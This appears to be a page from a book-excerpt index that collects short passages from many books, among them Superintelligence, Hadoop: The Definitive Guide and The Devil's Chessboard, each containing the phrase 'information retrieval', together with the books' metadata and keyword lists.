From 1996 on, Thad Starner, who like Steve Mann was a member of the MIT cyborg group, worked on the Remembrance Agent, a tool that would sit on your computer desktop (or now, your mobile device) and not only record what you were doing but make suggestions about what you might be interested in looking at next. See Bradley J. Rhodes and Thad Starner, “Remembrance Agent: A Continuously Running Personal Information Retrieval System,” Proceedings of the First International Conference on the Practical Application of Intelligent Agents and Multi Agent Technology (PAAM ’96),487-495, 487-495, www.bradleyrhodes.com/Papers/remembrance.html (accessed December 14, 2009).Albert Frigo’s “Storing, Indexing and Retrieving My Autobiography,” presented at the 2004 Workshop on Memory and the Sharing of Experience in Vienna, Austria, describes a device to take pictures of what comes into his hand.


pages: 574 words: 164,509

Superintelligence: Paths, Dangers, Strategies by Nick Bostrom

agricultural Revolution, AI winter, Albert Einstein, algorithmic trading, anthropic principle, anti-communist, artificial general intelligence, autonomous vehicles, barriers to entry, Bayesian statistics, bioinformatics, brain emulation, cloud computing, combinatorial explosion, computer vision, cosmological constant, dark matter, DARPA: Urban Challenge, data acquisition, delayed gratification, demographic transition, different worldview, Donald Knuth, Douglas Hofstadter, Drosophila, Elon Musk, en.wikipedia.org, endogenous growth, epigenetics, fear of failure, Flash crash, Flynn Effect, friendly AI, Gödel, Escher, Bach, income inequality, industrial robot, informal economy, information retrieval, interchangeable parts, iterative process, job automation, John Markoff, John von Neumann, knowledge worker, longitudinal study, Menlo Park, meta analysis, meta-analysis, mutually assured destruction, Nash equilibrium, Netflix Prize, new economy, Norbert Wiener, NP-complete, nuclear winter, optical character recognition, pattern recognition, performance metric, phenotype, prediction markets, price stability, principal–agent problem, race to the bottom, random walk, Ray Kurzweil, recommendation engine, reversible computing, social graph, speech recognition, Stanislav Petrov, statistical model, stem cell, Stephen Hawking, strong AI, superintelligent machines, supervolcano, technological singularity, technoutopianism, The Coming Technological Singularity, The Nature of the Firm, Thomas Kuhn: the structure of scientific revolutions, transaction costs, Turing machine, Vernor Vinge, Watson beat the top human players on Jeopardy!, World Values Survey, zero-sum game

Software polices the world’s email traffic, and despite continual adaptation by spammers to circumvent the countermeasures being brought against them, Bayesian spam filters have largely managed to hold the spam tide at bay. Software using AI components is responsible for automatically approving or declining credit card transactions, and continuously monitors account activity for signs of fraudulent use. Information retrieval systems also make extensive use of machine learning. The Google search engine is, arguably, the greatest AI system that has yet been built. Now, it must be stressed that the demarcation between artificial intelligence and software in general is not sharp. Some of the applications listed above might be viewed more as generic software applications rather than AI in particular—though this brings us back to McCarthy’s dictum that when something works it is no longer called AI.


Smart Grid Standards by Takuro Sato

business cycle, business process, carbon footprint, clean water, cloud computing, data acquisition, decarbonisation, demand response, distributed generation, energy security, factory automation, information retrieval, Intergovernmental Panel on Climate Change (IPCC), Internet of things, Iridium satellite, iterative process, knowledge economy, life extension, linear programming, low earth orbit, market design, MITM: man-in-the-middle, off grid, oil shale / tar sands, packet switching, performance metric, RFC: Request For Comment, RFID, smart cities, smart grid, smart meter, smart transportation, Thomas Davenport

Unlike C12.18 or C12.21 protocols, which only support session-oriented communications, the sessionless communication has the advantage of requiring less complex handling on both sides of the communication links and reduces the number of signaling overhead. ANSI C12.22 has a common application layer (layer 7 in the OSI, Open System Interconnection, reference model), which provides a minimal set of services and data structures required to support C12.22 nodes for the purposes of configuration, programming, and information retrieval in a networked environment. The application layer is independent of the underlying network technologies. This enables interoperability between C12.22 with already existing communication systems. C12.22 also defines a number of application layer services, which are combined to realize the various functions of the C12.22 protocols. The application layer services provided in C12.22 are • Identification Service: This service is used to obtain information about C12.19 device functionality, including the reference standard, the version and revision of the reference standard implemented, and an optional feature list.


pages: 1,331 words: 163,200

Hands-On Machine Learning With Scikit-Learn and TensorFlow: Concepts, Tools, and Techniques to Build Intelligent Systems by Aurélien Géron

Amazon Mechanical Turk, Anton Chekhov, combinatorial explosion, computer vision, constrained optimization, correlation coefficient, crowdsourcing, don't repeat yourself, Elon Musk, en.wikipedia.org, friendly AI, ImageNet competition, information retrieval, iterative process, John von Neumann, Kickstarter, natural language processing, Netflix Prize, NP-complete, optical character recognition, P = NP, p-value, pattern recognition, pull request, recommendation engine, self-driving car, sentiment analysis, SpamAssassin, speech recognition, stochastic process

Visualize the images that most activate each neuron in the coding layer. Build a classification deep neural network, reusing the lower layers of the autoencoder. Train it using only 10% of the training set. Can you get it to perform as well as the same classifier trained on the full training set? Semantic hashing, introduced in 2008 by Ruslan Salakhutdinov and Geoffrey Hinton,13 is a technique used for efficient information retrieval: a document (e.g., an image) is passed through a system, typically a neural network, which outputs a fairly low-dimensional binary vector (e.g., 30 bits). Two similar documents are likely to have identical or very similar hashes. By indexing each document using its hash, it is possible to retrieve many documents similar to a particular document almost instantly, even if there are billions of documents: just compute the hash of the document and look up all documents with that same hash (or hashes differing by just one or two bits).


pages: 611 words: 188,732

Valley of Genius: The Uncensored History of Silicon Valley (As Told by the Hackers, Founders, and Freaks Who Made It Boom) by Adam Fisher

Airbnb, Albert Einstein, AltaVista, Apple II, Apple's 1984 Super Bowl advert, augmented reality, autonomous vehicles, Bob Noyce, Brownian motion, Buckminster Fuller, Burning Man, Byte Shop, cognitive dissonance, disintermediation, don't be evil, Donald Trump, Douglas Engelbart, Dynabook, Elon Musk, frictionless, glass ceiling, Hacker Ethic, Howard Rheingold, HyperCard, hypertext link, index card, informal economy, information retrieval, Jaron Lanier, Jeff Bezos, Jeff Rulifson, John Markoff, Jony Ive, Kevin Kelly, Kickstarter, knowledge worker, life extension, Marc Andreessen, Mark Zuckerberg, Marshall McLuhan, Maui Hawaii, Menlo Park, Metcalfe’s law, Mother of all demos, move fast and break things, move fast and break things, Network effects, new economy, nuclear winter, PageRank, Paul Buchheit, paypal mafia, peer-to-peer, Peter Thiel, pets.com, pez dispenser, popular electronics, random walk, risk tolerance, Robert Metcalfe, rolodex, self-driving car, side project, Silicon Valley, Silicon Valley startup, skunkworks, Skype, social graph, social web, South of Market, San Francisco, Startup school, Steve Jobs, Steve Wozniak, Steven Levy, Stewart Brand, Ted Nelson, telerobotics, The Hackers Conference, the new new thing, Tim Cook: Apple, tulip mania, V2 rocket, Whole Earth Catalog, Whole Earth Review, Y Combinator

Alan Kay: We could actually see that ideas could be organized in a different way, that they could be filtered in a different way, that what we were looking at was not something that was trying to automate current modes of thought, but that there should be an amplification relationship between us and this new technology. Engelbart’s NLS terminal had a screen and keyboard, windows, and a mouse. He showed off a way to edit text, a version of e-mail, even a primitive Skype. To modern eyes, Engelbart’s computer system looks pretty familiar, but to an audience used to punch cards and printouts it was a revelation. The computer could be more than a number cruncher; it could be a communications and information-retrieval tool. In one ninety-minute demo Engelbart shattered the military-industrial computing paradigm, and gave the hippies and freethinkers and radicals who were already gathering in Silicon Valley a vision of the future that would drive the culture of technology for the next several decades. Bob Taylor: There was about a thousand or more people in the audience and they were blown away. Andy van Dam: I was blown away to see this professional system with this unbelievable richness and complexity.


In the Age of the Smart Machine by Shoshana Zuboff

affirmative action, American ideology, blue-collar work, collective bargaining, computer age, Computer Numeric Control, conceptual framework, data acquisition, demand response, deskilling, factory automation, Ford paid five dollars a day, fudge factor, future of work, industrial robot, information retrieval, interchangeable parts, job automation, lateral thinking, linked data, Marshall McLuhan, means of production, old-boy network, optical character recognition, Panopticon Jeremy Bentham, post-industrial society, RAND corporation, Shoshana Zuboff, social web, The Wealth of Nations by Adam Smith, Thorstein Veblen, union organizing, zero-sum game

It comes from understanding your business. The designers complained that as systems use became more central to task performance, managers and operators would need a more ana- lytic understanding of their work in order to determine their informa- tion requirements. They would also need a deeper level of insight into the systems themselves (procedural reasoning) that would allow them to go beyond simple information retrieval to actually becoming familiar with data and generatin'g new insights. People don't know enough about what goes into making up their job. Time hasn't been spent with them to tell them why. They've just been told, "Here's the system and here's how to use it." But they have to learn more about their job and more about the systems if The Dominion of the Smart Machine 283 they are going to figure out not only how to get data but what data they need.


pages: 685 words: 203,949

The Organized Mind: Thinking Straight in the Age of Information Overload by Daniel J. Levitin

airport security, Albert Einstein, Amazon Mechanical Turk, Anton Chekhov, Bayesian statistics, big-box store, business process, call centre, Claude Shannon: information theory, cloud computing, cognitive bias, complexity theory, computer vision, conceptual framework, correlation does not imply causation, crowdsourcing, cuban missile crisis, Daniel Kahneman / Amos Tversky, delayed gratification, Donald Trump, en.wikipedia.org, epigenetics, Eratosthenes, Exxon Valdez, framing effect, friendly fire, fundamental attribution error, Golden Gate Park, Google Glasses, haute cuisine, impulse control, index card, indoor plumbing, information retrieval, invention of writing, iterative process, jimmy wales, job satisfaction, Kickstarter, life extension, longitudinal study, meta analysis, meta-analysis, more computing power than Apollo, Network effects, new economy, Nicholas Carr, optical character recognition, Pareto efficiency, pattern recognition, phenotype, placebo effect, pre–internet, profit motive, randomized controlled trial, Rubik’s Cube, shared worldview, Skype, Snapchat, social intelligence, statistical model, Steve Jobs, supply-chain management, the scientific method, The Wealth of Nations by Adam Smith, The Wisdom of Crowds, theory of mind, Thomas Bayes, Turing test, ultimatum game, zero-sum game

Publisher’s Weekly, 246(2), p. 63. All bits are created equal After writing this, I discovered the same phrase “all bits are created equal” in Gleick, J. (2011). The information: A history, a theory, a flood. New York, NY: Vintage. Information has thus become separated from meaning Gleick writes “information is divorced from meaning.” He cites the technology philosopher Lewis Mumford from 1970: “Unfortunately, ‘information retrieving,’ however swift, is no substitute for discovering by direct personal inspection knowledge whose very existence one had possibly never been aware of, and following it at one’s own pace through the further ramification of relevant literature.” Gleick, J. (2011). The information: A history, a theory, a flood. New York, NY: Vintage. “The medium does matter. . . .” Carr, N. (2010). The shallows: What the internet is doing to our brains.


Mining of Massive Datasets by Jure Leskovec, Anand Rajaraman, Jeffrey David Ullman

cloud computing, crowdsourcing, en.wikipedia.org, first-price auction, G4S, information retrieval, John Snow's cholera map, Netflix Prize, NP-complete, PageRank, pattern recognition, random walk, recommendation engine, second-price auction, sentiment analysis, social graph, statistical model, web application

Gaber, Scientific Data Mining and Knowledge Discovery – Principles and Foundations, Springer, New York, 2010. [3]H. Garcia-Molina, J.D. Ullman, and J. Widom, Database Systems: The Complete Book Second Edition, Prentice-Hall, Upper Saddle River, NJ, 2009. [4]D.E. Knuth, The Art of Computer Programming Vol. 3 (Sorting and Searching), Second Edition, Addison-Wesley, Upper Saddle River, NJ, 1998. [5]C.P. Manning, P. Raghavan, and H. Schütze, Introduction to Information Retrieval, Cambridge University Press, 2008. [6]R.K. Merton, “The Matthew effect in science,” Science 159:3810, pp. 56–63, Jan. 5, 1968. [7]P.-N. Tan, M. Steinbach, and V. Kumar, Introduction to Data Mining, Addison-Wesley, Upper Saddle River, NJ, 2005. 1 This startup attempted to use machine learning to mine large-scale data, and hired many of the top machine-learning people to do so. Unfortunately, it was not able to survive. 2 See http://en.wikipedia.org/wiki/1854_Broad_Street_cholera_outbreak. 3 That is, assume our hypothesis that terrorists will surely buy a set of 10 items in common at some time during the year.


The Code: Silicon Valley and the Remaking of America by Margaret O'Mara

"side hustle", A Declaration of the Independence of Cyberspace, accounting loophole / creative accounting, affirmative action, Airbnb, AltaVista, Amazon Web Services, Apple II, Apple's 1984 Super Bowl advert, autonomous vehicles, back-to-the-land, barriers to entry, Ben Horowitz, Berlin Wall, Bob Noyce, Buckminster Fuller, Burning Man, business climate, Byte Shop, California gold rush, carried interest, clean water, cleantech, cloud computing, cognitive dissonance, commoditize, computer age, continuous integration, cuban missile crisis, Danny Hillis, DARPA: Urban Challenge, deindustrialization, different worldview, don't be evil, Donald Trump, Doomsday Clock, Douglas Engelbart, Dynabook, Edward Snowden, El Camino Real, Elon Musk, en.wikipedia.org, Erik Brynjolfsson, Frank Gehry, George Gilder, gig economy, Googley, Hacker Ethic, high net worth, Hush-A-Phone, immigration reform, income inequality, informal economy, information retrieval, invention of movable type, invisible hand, Isaac Newton, Jeff Bezos, Joan Didion, job automation, job-hopping, John Markoff, Julian Assange, Kitchen Debate, knowledge economy, knowledge worker, Lyft, Marc Andreessen, Mark Zuckerberg, market bubble, mass immigration, means of production, mega-rich, Menlo Park, Mikhail Gorbachev, millennium bug, Mitch Kapor, Mother of all demos, move fast and break things, move fast and break things, mutually assured destruction, new economy, Norbert Wiener, old-boy network, pattern recognition, Paul Graham, Paul Terrell, paypal mafia, Peter Thiel, pets.com, pirate software, popular electronics, pre–internet, Ralph Nader, RAND corporation, Richard Florida, ride hailing / ride sharing, risk tolerance, Robert Metcalfe, Ronald Reagan, Sand Hill Road, Second Machine Age, self-driving car, shareholder value, side project, Silicon Valley, Silicon Valley ideology, Silicon Valley startup, skunkworks, Snapchat, social graph, software is eating the world, speech recognition, Steve Ballmer, Steve Jobs, Steve Wozniak, Steven Levy, Stewart Brand, supercomputer in your pocket, technoutopianism, Ted Nelson, the market place, the new new thing, There's no reason for any individual to have a computer in his home - Ken Olsen, Thomas L Friedman, Tim Cook: Apple, transcontinental railway, Uber and Lyft, uber lyft, Unsafe at Any Speed, upwardly mobile, Vannevar Bush, War on Poverty, We wanted flying cars, instead we got 140 characters, Whole Earth Catalog, WikiLeaks, William Shockley: the traitorous eight, Y Combinator, Y2K

In 1968, the dealers put out the job of “automating” their system for bid, and the firm that won was a four-year-old Southern California start-up named Bunker Ramo. The firm had defense industry roots: founded by Martin Marietta president George Bunker and TRW vice president Simon Ramo, the firm was dedicated to what the two founders termed “a national need in the application of electronics to information handling.” An early client was NASA, for which Bunker Ramo built one of the world’s first computerized information retrieval systems, using the networked computer to classify and categorize large data sets a la Vannevar Bush’s memex.16 At first, the system Bunker Ramo designed for the dealers was simply another digital database that put paper stock tables on line. But when the firm added a feature that allowed brokers to buy and sell over the network, AT&T again cried foul. This wasn’t time-sharing anymore, AT&T lawyers argued; it was two-way telecommunication, and Ma Bell would no longer lease Bunker Ramo its lines.17 Just like Thomas Carter, Bunker and Ramo pushed back.


pages: 933 words: 205,691

Hadoop: The Definitive Guide by Tom White

Amazon Web Services, bioinformatics, business intelligence, combinatorial explosion, database schema, Debian, domain-specific language, en.wikipedia.org, fault tolerance, full text search, Grace Hopper, information retrieval, Internet Archive, Kickstarter, linked data, loose coupling, openstreetmap, recommendation engine, RFID, SETI@home, social graph, web application

Here are the contents of MaxTemperatureWithCounters_Temperature.properties: CounterGroupName=Air Temperature Records MISSING.name=Missing MALFORMED.name=Malformed Hadoop uses the standard Java localization mechanisms to load the correct properties for the locale you are running in, so, for example, you can create a Chinese version of the properties in a file named MaxTemperatureWithCounters_Temperature_zh_CN.properties, and they will be used when running in the zh_CN locale. Refer to the documentation for java.util.PropertyResourceBundle for more information. Retrieving counters In addition to being available via the web UI and the command line (using hadoop job -counter), you can retrieve counter values using the Java API. You can do this while the job is running, although it is more usual to get counters at the end of a job run, when they are stable. Example 8-2 shows a program that calculates the proportion of records that have missing temperature fields.


pages: 843 words: 223,858

The Rise of the Network Society by Manuel Castells

"Robert Solow", Apple II, Asian financial crisis, barriers to entry, Big bang: deregulation of the City of London, Bob Noyce, borderless world, British Empire, business cycle, capital controls, complexity theory, computer age, computerized trading, creative destruction, Credit Default Swap, declining real wages, deindustrialization, delayed gratification, dematerialisation, deskilling, disintermediation, double helix, Douglas Engelbart, Douglas Engelbart, edge city, experimental subject, financial deregulation, financial independence, floating exchange rates, future of work, global village, Gunnar Myrdal, Hacker Ethic, hiring and firing, Howard Rheingold, illegal immigration, income inequality, Induced demand, industrial robot, informal economy, information retrieval, intermodal, invention of the steam engine, invention of the telephone, inventory management, James Watt: steam engine, job automation, job-hopping, John Markoff, knowledge economy, knowledge worker, labor-force participation, laissez-faire capitalism, Leonard Kleinrock, longitudinal study, low skilled workers, manufacturing employment, Marc Andreessen, Marshall McLuhan, means of production, megacity, Menlo Park, moral panic, new economy, New Urbanism, offshore financial centre, oil shock, open economy, packet switching, Pearl River Delta, peer-to-peer, planetary scale, popular capitalism, popular electronics, post-industrial society, postindustrial economy, prediction markets, Productivity paradox, profit maximization, purchasing power parity, RAND corporation, Robert Gordon, Robert Metcalfe, Shoshana Zuboff, Silicon Valley, Silicon Valley startup, social software, South China Sea, South of Market, San Francisco, special economic zone, spinning jenny, statistical model, Steve Jobs, Steve Wozniak, Ted Nelson, the built environment, the medium is the message, the new new thing, The Wealth of Nations by Adam Smith, Thomas Kuhn: the structure of scientific revolutions, total factor productivity, trade liberalization, transaction costs, urban renewal, urban sprawl, zero-sum game

From these he accepts only a few dozen each instant, from which to make an image.19 Because of the low definition of TV, McLuhan argued, viewers have to fill in the gaps in the image, thus becoming more emotionally involved in the viewing (what he, paradoxically, characterized as a “cool medium”). Such involvement does not contradict the hypothesis of the least effort because TV appeals to the associative/lyrical mind, not involving the psychological effort of information retrieving and analyzing to which Herbert Simon’s theory refers. This is why Neil Postman, a leading media scholar, considers that television represents an historical rupture with the typographic mind. While print favors systematic exposition, TV is best suited to casual conversation. To make the distinction sharply, in his own words: “Typography has the strongest possible bias towards exposition: a sophisticated ability to think conceptually, deductively and sequentially; a high valuation of reason and order; an abhorrence of contradiction; a large capacity for detachment and objectivity; and a tolerance for delayed response.”20 While for television, “entertainment is the supra-ideology of all discourse on television.


Seeking SRE: Conversations About Running Production Systems at Scale by David N. Blank-Edelman

Affordable Care Act / Obamacare, algorithmic trading, Amazon Web Services, bounce rate, business continuity plan, business process, cloud computing, cognitive bias, cognitive dissonance, commoditize, continuous integration, crowdsourcing, dark matter, database schema, Debian, defense in depth, DevOps, domain-specific language, en.wikipedia.org, fault tolerance, fear of failure, friendly fire, game design, Grace Hopper, information retrieval, Infrastructure as a Service, Internet of things, invisible hand, iterative process, Kubernetes, loose coupling, Lyft, Marc Andreessen, microservices, minimum viable product, MVC pattern, performance metric, platform as a service, pull request, RAND corporation, remote working, Richard Feynman, risk tolerance, Ruby on Rails, search engine result page, self-driving car, sentiment analysis, Silicon Valley, single page application, Snapchat, software as a service, software is eating the world, source of truth, the scientific method, Toyota Production System, web application, WebSocket, zero day

At that point, prerequisites might be as simple as, “The load will be no more than 10 requests per second, and we expect that responses will take no longer than 10 seconds for a single URL request.” Now let’s invite an SRE to the conversation. One of their first questions would be something like, “Who are our customers? And why is getting the response in 10 seconds important for them?” Despite the fact that these questions came primarily from the business perspective, the information questions like these reveal can change the game dramatically. What if this service is for an “information retrieval” development team whose purpose is to address the necessity of content validation on the search engine results page, to make sure that the new index serves only live links? And what if we download a page with a million links on it? Now we can see the conflict between the priorities in the SLA and those of the service’s purposes. The SLA stated that the response time is crucial, but the service is intended to verify data, with accuracy as the most vital aspect of the service for the end user.


Red Rabbit by Tom Clancy, Scott Brick

anti-communist, battle of ideas, diversified portfolio, Ignaz Semmelweis: hand washing, information retrieval, union organizing, urban renewal

"They operate within fairly strict rules, and both sides seem to play by them." And on both sides, killings had to be authorized at a very high level. Not that this would matter all that much to the corpse in question. "Wet" operations interfered with the main mission, which was gathering information. That was something people occasionally forgot, but something that CIA and KGB mainly understood, which was why both agencies had gotten away from it. But when the information retrieved frightened or otherwise upset the politicians who oversaw the intelligence services, then the spook shops were ordered to do things that they usually preferred to avoid—and so, then, they took their action through surrogates and/or mercenaries, mainly… "Arthur, if KGB wants to hurt the Pope, how do you suppose they'd go about it?" "Not one of their own," Moore thought. "Too dangerous. It would be a political catastrophe, like a tornado going right through the Kremlin.


pages: 761 words: 231,902

The Singularity Is Near: When Humans Transcend Biology by Ray Kurzweil

additive manufacturing, AI winter, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, Albert Einstein, anthropic principle, Any sufficiently advanced technology is indistinguishable from magic, artificial general intelligence, Asilomar, augmented reality, autonomous vehicles, Benoit Mandelbrot, Bill Joy: nanobots, bioinformatics, brain emulation, Brewster Kahle, Brownian motion, business cycle, business intelligence, c2.com, call centre, carbon-based life, cellular automata, Claude Shannon: information theory, complexity theory, conceptual framework, Conway's Game of Life, coronavirus, cosmological constant, cosmological principle, cuban missile crisis, data acquisition, Dava Sobel, David Brooks, Dean Kamen, disintermediation, double helix, Douglas Hofstadter, en.wikipedia.org, epigenetics, factory automation, friendly AI, George Gilder, Gödel, Escher, Bach, informal economy, information retrieval, invention of the telephone, invention of the telescope, invention of writing, iterative process, Jaron Lanier, Jeff Bezos, job automation, job satisfaction, John von Neumann, Kevin Kelly, Law of Accelerating Returns, life extension, lifelogging, linked data, Loebner Prize, Louis Pasteur, mandelbrot fractal, Marshall McLuhan, Mikhail Gorbachev, Mitch Kapor, mouse model, Murray Gell-Mann, mutually assured destruction, natural language processing, Network effects, new economy, Norbert Wiener, oil shale / tar sands, optical character recognition, pattern recognition, phenotype, premature optimization, randomized controlled trial, Ray Kurzweil, remote working, reversible computing, Richard Feynman, Robert Metcalfe, Rodney Brooks, scientific worldview, Search for Extraterrestrial Intelligence, selection bias, semantic web, Silicon Valley, Singularitarianism, speech recognition, statistical model, stem cell, Stephen Hawking, Stewart Brand, strong AI, superintelligent machines, technological singularity, Ted Kaczynski, telepresence, The Coming Technological Singularity, Thomas Bayes, transaction costs, Turing machine, Turing test, Vernor Vinge, Y2K, Yogi Berra

John Smith, director of the ABC Institute—you last saw him six months ago at the XYZ conference" or, "That's the Time-Life Building—your meeting is on the tenth floor." We'll have real-time translation of foreign languages, essentially subtitles on the world, and access to many forms of online information integrated into our daily activities. Virtual personalities that overlay the real world will help us with information retrieval and our chores and transactions. These virtual assistants won't always wait for questions and directives but will step forward if they see us struggling to find a piece of information. (As we wonder about "That actress ... who played the princess, or was it the queen ... in that movie with the robot," our virtual assistant may whisper in our ear or display in our visual field of view: "Natalie Portman as Queen Amidala in Star Wars, episodes 1, 2, and 3.")


pages: 496 words: 174,084

Masterminds of Programming: Conversations With the Creators of Major Programming Languages by Federico Biancuzzi, Shane Warden

Benevolent Dictator For Life (BDFL), business intelligence, business process, cellular automata, cloud computing, commoditize, complexity theory, conceptual framework, continuous integration, data acquisition, domain-specific language, Douglas Hofstadter, Fellow of the Royal Society, finite state, Firefox, follow your passion, Frank Gehry, general-purpose programming language, Guido van Rossum, HyperCard, information retrieval, iterative process, John von Neumann, Larry Wall, linear programming, loose coupling, Mars Rover, millennium bug, NP-complete, Paul Graham, performance metric, Perl 6, QWERTY keyboard, RAND corporation, randomized controlled trial, Renaissance Technologies, Ruby on Rails, Sapir-Whorf hypothesis, Silicon Valley, slashdot, software as a service, software patent, sorting algorithm, Steve Jobs, traveling salesman, Turing complete, type inference, Valgrind, Von Neumann architecture, web application

Don: That’s right, and if you misspell something, or don’t remember exactly what the join column is in a table, your query might not work at all in SQL, whereas less deterministic interfaces like Google are much more forgiving on small mistakes like that. You believe in the importance of determinism. When I write a line of code, I need to rely on understanding what it’s going to do. Don: Well, there are applications where determinism is important and applications where it is not. Traditionally there has been a dividing line between what you might call databases and what you might call information retrieval. Certainly both of those are flourishing fields and they have their respective uses. XQuery and XML Will XML affect the way we use search engines in the future? Don: I think it’s possible. Search engines already exploit the kinds of metadata that are included in HTML tags such as hyperlinks. As you know, XML is a more extensible markup language than HTML. As we begin to see more XML-based standards for marking up specialized documents such as medical and business documents, I think that search engines will learn to take advantage of the semantic information in that markup.


pages: 857 words: 232,302

The Evolutionary Void by Peter F. Hamilton

clean water, information retrieval, Kickstarter, megacity, orbital mechanics / astrodynamics, pattern recognition, plutocrats, Plutocrats, trade route, urban sprawl

That kind of knowledge could only help contribute to going postphysical, surely.” “Don’t call me Shirley.” “What?” Gore ran a hand over his forehead. “Yeah. Right. Whatever.” The Delivery Man was mildly puzzled by Gore’s lack of focus. It wasn’t like him at all. “All right. So what I was thinking is that there has to be some kind of web and database in the cities.” “There is. You can’t access it.” “Why not?” “The AIs are sentient. They won’t allow any information retrieval.” “That’s stupid.” “From our point of view, yes, but they’re the same as the borderguards: They maintain the homeworld’s sanctity; the AIs keep the Anomine’s information safe.” “Why?” “Because that’s what the Anomine do; that’s what they are. They’re entitled to protect what they’ve built, same as anyone.” “But we’re not damag—” “I know!” Gore snarled. “I fucking know that, all right.


pages: 1,201 words: 233,519

Coders at Work by Peter Seibel

Ada Lovelace, bioinformatics, cloud computing, Conway's Game of Life, domain-specific language, don't repeat yourself, Donald Knuth, fault tolerance, Fermat's Last Theorem, Firefox, George Gilder, glass ceiling, Guido van Rossum, HyperCard, information retrieval, Larry Wall, loose coupling, Marc Andreessen, Menlo Park, Metcalfe's law, Perl 6, premature optimization, publish or perish, random walk, revision control, Richard Stallman, rolodex, Ruby on Rails, Saturday Night Live, side project, slashdot, speech recognition, the scientific method, Therac-25, Turing complete, Turing machine, Turing test, type inference, Valgrind, web application

If I was going to draw lessons from it—well again, I'm kind of an elitist: I would say that the people who should be programming are the people who feel comfortable in the world of symbols. If you don't feel really pretty comfortable swimming around in that world, maybe programming isn't what you should be doing. Seibel: Did you have any important mentors? Deutsch: There were two people. One of them is someone who's no longer around; his name was Calvin Mooers. He was an early pioneer in information systems. I believe he is credited with actually coining the term information retrieval. His background was originally in library science. I met him when I was, I think, high-school or college age. He had started to design a programming language that he thought would be usable directly by just people. But he didn't know anything about programming languages. And at that point, I did because I had built this Lisp system and I'd studied some other programming languages. So we got together and the language that he eventually wound up making was one that I think it's fair to say he and I kind of codesigned.


pages: 903 words: 235,753

The Stack: On Software and Sovereignty by Benjamin H. Bratton

1960s counterculture, 3D printing, 4chan, Ada Lovelace, additive manufacturing, airport security, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, algorithmic trading, Amazon Mechanical Turk, Amazon Web Services, augmented reality, autonomous vehicles, basic income, Benevolent Dictator For Life (BDFL), Berlin Wall, bioinformatics, bitcoin, blockchain, Buckminster Fuller, Burning Man, call centre, carbon footprint, carbon-based life, Cass Sunstein, Celebration, Florida, charter city, clean water, cloud computing, connected car, corporate governance, crowdsourcing, cryptocurrency, dark matter, David Graeber, deglobalization, dematerialisation, disintermediation, distributed generation, don't be evil, Douglas Engelbart, Douglas Engelbart, Edward Snowden, Elon Musk, en.wikipedia.org, Eratosthenes, Ethereum, ethereum blockchain, facts on the ground, Flash crash, Frank Gehry, Frederick Winslow Taylor, future of work, Georg Cantor, gig economy, global supply chain, Google Earth, Google Glasses, Guggenheim Bilbao, High speed trading, Hyperloop, illegal immigration, industrial robot, information retrieval, Intergovernmental Panel on Climate Change (IPCC), intermodal, Internet of things, invisible hand, Jacob Appelbaum, Jaron Lanier, Joan Didion, John Markoff, Joi Ito, Jony Ive, Julian Assange, Khan Academy, liberal capitalism, lifelogging, linked data, Mark Zuckerberg, market fundamentalism, Marshall McLuhan, Masdar, McMansion, means of production, megacity, megastructure, Menlo Park, Minecraft, MITM: man-in-the-middle, Monroe Doctrine, Network effects, new economy, offshore financial centre, oil shale / tar sands, packet switching, PageRank, pattern recognition, peak oil, peer-to-peer, performance metric, personalized medicine, Peter Eisenman, Peter Thiel, phenotype, Philip Mirowski, Pierre-Simon Laplace, place-making, planetary scale, RAND corporation, recommendation engine, reserve currency, RFID, Robert Bork, Sand Hill Road, self-driving car, semantic web, sharing economy, Silicon Valley, Silicon Valley ideology, Slavoj Žižek, smart cities, smart grid, smart meter, social graph, software studies, South China Sea, sovereign wealth fund, special economic zone, spectrum auction, Startup school, statistical arbitrage, Steve Jobs, Steven Levy, Stewart Brand, Stuxnet, Superbowl ad, supply-chain management, supply-chain management software, TaskRabbit, the built environment, The Chicago School, the scientific method, Torches of Freedom, transaction costs, Turing complete, Turing machine, Turing test, undersea cable, universal basic income, urban planning, Vernor Vinge, Washington Consensus, web application, Westphalian system, WikiLeaks, working poor, Y Combinator

., telcos, states, standards bodies, hardware original equipment manufacturers, and cloud software platforms) all play different roles and control hardware and software applications in different ways and toward different ends. Internet backbone is generally provided and shared by tier 1 bandwidth providers (such as telcos), but one key trend is for very large platforms, such as Google, to bypass other actors and architect complete end-to-end networks, from browser, to fiber, to data center, such that information retrieval, composition, and analysis are consolidated and optimized on private loops. Consider that if Google's own networks, both internal and external, were compared to others, they would represent one of the largest Internet service providers in the world, and by the time this sentence is published, they may very well be the largest. Google indexes the public Internet and mirrors as much of it as possible on its own servers so that it can serve search results and popular pages quickly to Users, regardless of where the original page may originally be coded, sourced, and hosted.


pages: 891 words: 253,901

The Devil's Chessboard: Allen Dulles, the CIA, and the Rise of America's Secret Government by David Talbot

Albert Einstein, anti-communist, Berlin Wall, Bretton Woods, British Empire, Charles Lindbergh, colonial rule, cuban missile crisis, drone strike, information retrieval, Internet Archive, land reform, means of production, Naomi Klein, Norman Mailer, operation paperclip, Ralph Waldo Emerson, RAND corporation

Olson helped oversee the Special Operations Division at Camp Detrick in Maryland, the biological weapons laboratory jointly operated by the U.S. Army and the CIA. The top secret work conducted by the SO Division included research on LSD-induced mind control, assassination toxins, and biological warfare agents like those allegedly being used in Korea. Olson’s division also was involved in research that was euphemistically labeled “information retrieval”—extreme methods of extracting intelligence from uncooperative captives. For the past two years, Olson had been traveling to secret centers in Europe where Soviet prisoners and other human guinea pigs were subjected to these experimental interrogation methods. Dulles began spearheading this CIA research even before he became director of the agency, under a secret program that preceded MKULTRA code-named Operation Artichoke, after the spymaster’s favorite vegetable.


pages: 982 words: 221,145

Ajax: The Definitive Guide by Anthony T. Holdener

AltaVista, Amazon Web Services, business process, centre right, create, read, update, delete, database schema, David Heinemeier Hansson, en.wikipedia.org, Firefox, full text search, game design, general-purpose programming language, Guido van Rossum, information retrieval, loose coupling, MVC pattern, Necker cube, p-value, Ruby on Rails, slashdot, sorting algorithm, web application

Is the site’s focus the white background that constitutes the entire page except for the navigation bar? You know nothing about this site until you dig further by following the links on the page. The point of a business site’s main page is to grab your attention with a central focus: We do web design. Our specialty is architectural engineering. We sell fluffy animals. Regardless of the focus, it should be readily apparent. * Chris Roast, “Designing for Delay in Interactive Information Retrieval,” Interacting with Computers 10 (1998): 87–104. “Need for Speed I,” Zona Research, Zona Market Bulletin (1999). “Need